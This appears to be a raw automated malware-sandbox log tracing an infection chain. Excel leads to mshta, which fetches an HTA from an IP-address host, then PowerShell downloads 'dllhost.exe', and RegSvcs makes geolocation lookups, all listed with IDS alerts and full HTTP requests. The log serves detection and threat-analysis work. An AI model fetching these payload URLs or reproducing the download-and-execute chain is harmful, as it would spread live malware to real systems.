Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49176 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49178 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49187 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49191 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49173 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49179 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49175 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49200 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49190 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49188 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49196 -> 188.114.97.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.6Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 172.245.123.6If-Range: "1ceb0-6234c398c9718"
Source: global traffic HTTP traffic detected: GET /770/dllhost.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.6Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 30 Sep 2024 01:35:50 GMTConnection: Keep-AliveHost: 172.245.123.6If-None-Match: "1ceb0-6234c398c9718"
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49189 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.123.6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE899A7018 URLDownloadToFileW, 7_2_000007FE899A7018
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF73AEE2.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.6Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 172.245.123.6If-Range: "1ceb0-6234c398c9718"
Source: global traffic HTTP traffic detected: GET /770/dllhost.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.6Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 30 Sep 2024 01:35:50 GMTConnection: Keep-AliveHost: 172.245.123.6If-None-Match: "1ceb0-6234c398c9718"
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: og1.in
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: mshta.exe, 0000000C.00000003.470945172.0000000003804000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.0000000003804000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.0000000003804000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.0000000003804000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/
Source: powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/770/dllhost
Source: powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/770/dllhost.exe
Source: powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/770/dllhost.exep
Source: powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.482999826.000000001C264000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/770/dllhost.exes
Source: powershell.exe, 00000011.00000002.482999826.000000001C264000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/770/dllhost.exes?e
Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/C
Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/O
Source: mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472468543.000000000374A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471050000.000000000374A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta
Source: mshta.exe, 0000000C.00000003.467118716.0000000000142000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472118068.0000000000131000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta...
Source: mshta.exe, 00000004.00000003.420063943.000000000305C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420394140.000000000305C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta...EEBDD-A8
Source: mshta.exe, 0000000C.00000003.468426129.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.000000000375C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta0
Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta4
Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta7
Source: mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta8A
Source: mshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaA
Source: mshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaC:
Source: mshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaW
